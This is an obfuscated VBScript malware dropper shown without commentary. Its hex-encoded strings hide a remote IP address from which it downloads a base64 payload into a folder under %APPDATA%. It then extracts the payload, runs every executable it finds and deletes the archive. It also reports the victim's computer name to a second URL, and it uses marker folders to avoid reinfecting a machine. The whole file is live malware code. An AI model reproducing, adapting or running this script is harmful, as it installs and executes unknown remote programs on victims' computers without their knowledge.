Option Explicit
dim  CSTWYLFBQTZOSSXZHLRBPTNOSHTXWJQBGAVZJGUYXJE,ClqtSIUWWJEQEDPAABCRGI,SEUZP,OBJHSVWWJERBOPUNNJSHUY,CQTZMFIUYIEDGAVZMFSXXHLRDPTNJSHVLWJQBGPVNJG
dim  JERDPAVBJSIUYLYIMQEDPTABCRFIUYLWJFQEDQTABCM,mqXFFRJUWm,NZOSHTXLJERBGPUNNJSHUYLXJER, BinaryStream
dim  GIYYMDCPNCFIYLIFDDQUBCFIXLHLQCQTZ,NZJGTXLWERBGAVZCRGSVWXIMQEDPAABCSGSVLWJMDCO,GAAJFTXZLFBGANNMHTWXJQEDPVZJGSVLIERCPUNNRGU,FBGAZOMFXZHLRDPAAOMFVWXJEEDPUZORHVWXJEEDPVZ,YHLQGQTZOMFIUYX
dim PAZJGTXLLQBGANCRHVWXJQEOANNJGSYYJEEDPUBCFSY,WJQCPUBCIVZWMDCOUNCRIUZWMDCOTZORIUYYLRBOTAB,JMHVZWLFDPAVZORGSVWXJERBOPUNNJSHUYLWMQECPAA,YZHLDCOPUZOMFIUXXHLMDCOQVABJFHTXZYIERBGQTAN,JENIICUMLQPOTYQQOIYFPBHZEGNSWLDVR
DIM oNode,req,SHVWHERBANNRHTWXJEEOAVZJGUYLJEEDPABJGSYLIFD,SHVWHMQEDPAVNCRGUYWYJEDCOPUNNMFIUYLWJFDCOPU
JERDPAVBJSIUYLYIMQEDPTABCRFIUYLWJFQEDQTABCM = BCFIYL("68 74 74 70 3A 2F 2F 32 33 2E 32 35 34 2E 32 31 35 2E 32 34 34 3A 35 39 38 39 2F 63 61 6C 6C 6F 66 66 64 75 74 74 79 2E 69 73 6F")
Set OBJHSVWWJERBOPUNNJSHUY = CreateObject( "WScript.Shell" )    
YHLQGQTZOMFIUYX = OBJHSVWWJERBOPUNNJSHUY.ExpandEnvironmentStrings(StrReverse("%ATADPPA%"))
GIYYMDCPNCFIYLIFDDQUBCFIXLHLQCQTZ = OBJHSVWWJERBOPUNNJSHUY.ExpandEnvironmentStrings( "%COMPUTERNAME%" )
JMHVZWLFDPAVZORGSVWXJERBOPUNNJSHUYLWMQECPAA = "DDPTZOMGVWXWLQEDPAVZORGSVWX.zip"
GAAJFTXZLFBGANNMHTWXJQEDPVZJGSVLIERCPUNNRGU = YHLQGQTZOMFIUYX + "\P6BE55AD4404748B5"
YIJQECOPUNNMFIUYLWLFDCOPUZOMFIUYLHLMDBGQTABCSHTX
URLGet(BCFIYL("68 74 74 70 3A 2F 2F 77 77 77 2E 67 6F 6F 67 6C 65 2E 63 6F 6D 2E 62 72"))
CQTZMFIUYIEDGAVZMFSXXHLRDPTNJSHVLWJQBGPVNJG = GAAJFTXZLFBGANNMHTWXJQEDPVZJGSVLIERCPUNNRGU
UAOMHT
XYLFBG
WScript.Sleep 3413
JMRBPU
WScript.Sleep 2140
ZBCRTX
YHMRGQ
Function UAOMHT()
SET WJQCPUBCIVZWMDCOUNCRIUZWMDCOTZORIUYYLRBOTAB = CREATEOBJECT("Scripting.FileSystemObject")
IF WJQCPUBCIVZWMDCOUNCRIUZWMDCOTZORIUYYLRBOTAB.FolderExists(YHLQGQTZOMFIUYX + "\MODERGRAU") = TRUE THEN WScript.Quit() END IF
IF WJQCPUBCIVZWMDCOUNCRIUZWMDCOTZORIUYYLRBOTAB.FolderExists(CQTZMFIUYIEDGAVZMFSXXHLRDPTNJSHVLWJQBGPVNJG) = FALSE THEN
WJQCPUBCIVZWMDCOUNCRIUZWMDCOTZORIUYYLRBOTAB.CreateFolder CQTZMFIUYIEDGAVZMFSXXHLRDPTNJSHVLWJQBGPVNJG
WJQCPUBCIVZWMDCOUNCRIUZWMDCOTZORIUYYLRBOTAB.CreateFolder OBJHSVWWJERBOPUNNJSHUY.ExpandEnvironmentStrings(StrReverse("%ATADPPA%")) + "\MODERGRAU"
END IF
End Function
Function ZBCRTX()
DIM jrtTUABRFIUZYIMQBxsd
Set jrtTUABRFIUZYIMQBxsd = Createobject("Scripting.FileSystemObject")
jrtTUABRFIUZYIMQBxsd.DeleteFile GAAJFTXZLFBGANNMHTWXJQEDPVZJGSVLIERCPUNNRGU & "\" & JMHVZWLFDPAVZORGSVWXJERBOPUNNJSHUYLWMQECPAA
End Function
Function JMRBPU()
set ClqtSIUWWJEQEDPAABCRGI = CreateObject("Shell.Application")
set SEUZP=ClqtSIUWWJEQEDPAABCRGI.NameSpace(GAAJFTXZLFBGANNMHTWXJQEDPVZJGSVLIERCPUNNRGU & "\" & JMHVZWLFDPAVZORGSVWXJERBOPUNNJSHUYLWMQECPAA).items
ClqtSIUWWJEQEDPAABCRGI.NameSpace(GAAJFTXZLFBGANNMHTWXJQEDPVZJGSVLIERCPUNNRGU & "\").CopyHere(SEUZP), 4
Set ClqtSIUWWJEQEDPAABCRGI = Nothing
End Function
Function URLGet(QANN)
Set JENIICUMLQPOTYQQOIYFPBHZEGNSWLDVR = CreateObject("Msxml2.XMLHttp.6.0")
JENIICUMLQPOTYQQOIYFPBHZEGNSWLDVR.Open "GET",QANN & "?" & GIYYMDCPNCFIYLIFDDQUBCFIXLHLQCQTZ ,True
JENIICUMLQPOTYQQOIYFPBHZEGNSWLDVR.Send
End Function   
Function YHMRGQ()
Dim ClqtSIUWWJEQEDPAABCRGILM,jxtJSHVLWJERCDPAAB,jrtTUABRFIUZYIMQBw,ColtMDCQVBCSHTXZYIERB
Set ClqtSIUWWJEQEDPAABCRGILM = WScript.CreateObject( "WScript.Shell" )
Set jrtTUABRFIUZYIMQBw = CreateObject( "Scripting.FileSystemObject" )
Set jxtJSHVLWJERCDPAAB = jrtTUABRFIUZYIMQBw.GetFolder(GAAJFTXZLFBGANNMHTWXJQEDPVZJGSVLIERCPUNNRGU)
Set ColtMDCQVBCSHTXZYIERB = jxtJSHVLWJERCDPAAB.Files
For Each ColtMDCQVBCSHTXZYIERB in ColtMDCQVBCSHTXZYIERB
If UCase(jrtTUABRFIUZYIMQBw.GetExtensionName(ColtMDCQVBCSHTXZYIERB.name)) = "EXE" Then
ClqtSIUWWJEQEDPAABCRGILM.Exec(GAAJFTXZLFBGANNMHTWXJQEDPVZJGSVLIERCPUNNRGU & "\" & ColtMDCQVBCSHTXZYIERB.Name)
WScript.Sleep 50
End If
Next
End Function
Private Sub QuitWithError(errNum)
ShowError GetResource("L_MsgErrorText_8"), NewCErr(errNum, Empty, Empty)
ExitScript errNum
End Sub
YZHLDCOPUZOMFIUXXHLMDCOQVABJFHTXZYIERBGQTAN = "SHVWHMQEDPAVNCRGUYWYJEDCOPUNNMFIUYLWJFDCOPU"
Function XYLFBG()
Set req = CreateObject("Msxml2.XMLHttp.6.0")
req.open "GET", JERDPAVBJSIUYLYIMQEDPTABCRFIUYLWJFQEDQTABCM, False
req.send
If req.Status = 200 Then
Const adTypeBinary = 1
Const adSaveCreateOverWrite = 2
Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")
oNode.dataType = "bin.base64"
oNode.text = req.responseText
Set BinaryStream = CreateObject("ADODB.Stream")
BinaryStream.Type = adTypeBinary
BinaryStream.Open
BinaryStream.Write oNode.nodeTypedValue
BinaryStream.SaveToFile GAAJFTXZLFBGANNMHTWXJQEDPVZJGSVLIERCPUNNRGU & "\" & JMHVZWLFDPAVZORGSVWXJERBOPUNNJSHUYLWMQECPAA, adSaveCreateOverWrite
End if
End Function
Function YIJQECOPUNNMFIUYLWLFDCOPUZOMFIUYLHLMDBGQTABCSHTX()
Set mqXFFRJUWm = CreateObject("Scripting.FileSystemObject")
If (mqXFFRJUWm.FolderExists(GAAJFTXZLFBGANNMHTWXJQEDPVZJGSVLIERCPUNNRGU )) Then
WScript.Quit()
End If 
End Function  
Function BCFIYL(h)
Dim a : a = Split(h)
Dim i
For i = 0 To UBound(a)
a(i) = Chr("&H" & a(i))
Next
BCFIYL = Join(a, "")
End Function